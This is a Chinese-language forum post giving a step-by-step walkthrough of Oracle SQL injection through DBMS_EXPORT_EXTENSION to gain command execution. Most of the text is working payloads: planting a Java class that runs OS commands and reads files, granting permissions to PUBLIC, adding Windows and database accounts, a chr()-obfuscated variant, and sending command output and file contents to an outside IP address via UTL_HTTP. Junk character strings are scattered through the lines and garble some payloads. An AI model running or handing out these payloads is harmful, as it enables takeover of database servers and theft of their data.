
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)   l* Q" z0 e' V7 g) D9 I
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用POST提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
* S' v5 i8 u; F3 G, tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 \, M+ ?+ `+ w7 @6 Q- r% o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 M0 [) h( D7 V3 a' u% F( {, fnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 i# v2 u0 f8 J) ?" X5 f: E
}'''';END;'';END;--','SYS',0,'1',0) from dual 8 G5 a8 R& a0 ~/ {- s- |4 }: z
) 4 w1 }! D& }' x4 f1 r# B  ~& l% u4 C
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
- [: J. ?5 l0 t9 x7 G1 H5 k1 Z/xxx.jsp?id=1 and '1'<>'a'||( 5 e0 c8 q$ m. j7 l! [/ q+ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" W) F4 T1 A; M  a. |( v
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(! D8 U) k  W7 B+ z) A$ J# W( e
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 V# e% [0 u$ V" i, S}'''';END;'';END;--','SYS',0,'1',0) from dual ( ?! ]* H$ n  E% D' e% Q
) , G) G% F1 m5 e3 q; u
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ Y' ^0 b* }- `. ]. u/ d
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual6 s- \, M6 h: H7 I1 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 O4 O; |; y* S/ }' }3 d
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual, {- |6 M2 C* I
4.赋public执行函数的权限
2 t* g5 E' {2 F( Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual, A# x9 u% \3 e+ O) A5 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual4 g$ R0 J% S' p& w$ n  S: N
5.测试上面的几步是否成功
and '1'<>'11'||( & h) @. m* o' u0 @
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
: S$ z( H; z0 })
2 ~: h# V, o# E" A+ E1 Sand '1'<>(
* ]& d* R: ]# C6 ?: F" b1 D4 i4 I2 ~select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
( _/ ~$ s; Q6 Q- B( A0 E9 [)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
5 x: m+ L, C/ y6 S+ nselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual : s1 U& _  M- B, ~  s: I

& _" E/ B  j+ ?)
. \& @5 R( @! [& G. y/xxx.jsp?id=1 and '1'<>( ' b5 ~5 e, x7 x, i! R! _
select  sys.LinxReadFile('c:/boot.ini') from dual- \% L6 ^$ B% r$ ~/ Y/ u) \
5 \0 g3 c; F' q3 W  E
)& i' S# j5 \; H  q7 e4 Q
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
& X1 l, P% ]" ^! M/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual. k9 ^* X+ i7 m4 u/ ]
或者用 UTL_HTTP.request():
8 s5 `5 D) g! z( l3 {/xxx.jsp?id=1 and '1'<>( 2 N/ G. z- A4 F3 N9 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# a5 i! |+ Q# M, b( C6 h* i)
; G7 O! O! ]0 k8 O0 ^4 L0 {/xxx.jsp?id=1 and '1'<>(
$ |, o( b  X& U# z5 g- U% ?$ d1 oSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: F9 Y- L* U' [
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
" A1 Z6 e* c$ O7.删除我们创建的函数
2 @2 ~. [, p* Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- e; ]) f# _$ h; h4 ~5 ]; Qdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
" t5 J3 O8 v: a5 ?2 I% H/ p3 I====================================================
全文结束。谨以此文赠与我的朋友。
linx
* F9 O8 w& N# p124829445 8 Z2 O) b7 R/ K6 Q5 `! s! ]
2008.1.12
" M' X" o- V8 r2 y$ C! ?3 tlinyujian@bjfu.edu.cn # `' o1 h( M- t$ j
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& i  H& a" S% H
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
2 N& ?$ X( C2 ]/ ]0 ], Q3 R" Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
/ B# ~4 }# [8 l2 @5 T. nchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ! z1 ~6 k' U! l9 E
确定漏洞存在:
1<>( , F" E+ u' V2 f! g
select user_id from all_users where username='LINXSQL'
; f, Q4 n" u+ |4 S; s7 R% u# J) 5 G* `3 F# c$ D7 _8 `% [
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 k; G3 D$ p/ x) u/ t
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 H5 {1 Z' f2 O6 w* t& Z( E
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 X' [9 M) T. S& K2 h# x& Q9 E
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的(authid current_user,即以调用者的权限执行),可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
/ C$ ]- m, K/ r$ I2 g* o( c8 W( M2 p/ J1.jsp?id=1 and '1'<>(
! V& ?- q/ A# Q" }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `7 P! }: ]/ gcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) C4 |( ?! e. p) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE$ k+ H! H  }% B5 z
 ): \4 g$ c$ i* h+ n$ i* g8 _




